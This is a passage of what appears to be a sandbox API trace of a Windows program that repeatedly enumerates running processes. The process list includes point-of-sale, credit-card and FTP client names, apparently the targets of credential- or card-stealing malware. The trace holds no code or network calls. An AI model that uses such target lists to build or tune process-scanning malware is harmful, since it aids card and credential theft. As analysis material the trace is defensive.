dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0266.130] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0266.132] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0266.134] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0266.159] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0266.161] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0266.163] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0266.165] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0266.171] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0266.173] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0266.175] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0266.177] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0266.179] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0266.181] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0266.187] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0266.189] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0266.191] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0266.193] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0266.195] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0266.197] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0266.232] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0266.234] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0266.236] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0266.238] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0266.240] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0266.242] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0266.244] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0266.246] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0266.248] CloseHandle (hObject=0x1018) returned 1 [0266.248] Sleep (dwMilliseconds=0x64) [0266.386] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0266.398] Process32First (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.400] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0266.402] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0266.404] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0266.406] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0266.408] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0266.410] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0266.412] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0266.414] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0266.415] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.441] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.444] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0266.446] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.448] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.450] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.452] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.454] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.456] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.458] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.460] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0266.461] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0266.464] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0266.465] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.467] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0266.469] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0266.471] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0266.473] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0266.476] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0266.478] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.497] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0266.498] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0266.500] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0266.501] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0266.502] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0266.504] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0266.505] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0266.507] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0266.508] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0266.510] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0266.511] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0266.513] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0266.514] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0266.515] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0266.517] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0266.518] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0266.520] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0266.521] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0266.523] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0266.524] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0266.525] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0266.527] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0266.528] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0266.530] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0266.531] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0266.533] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0266.534] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0266.535] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, 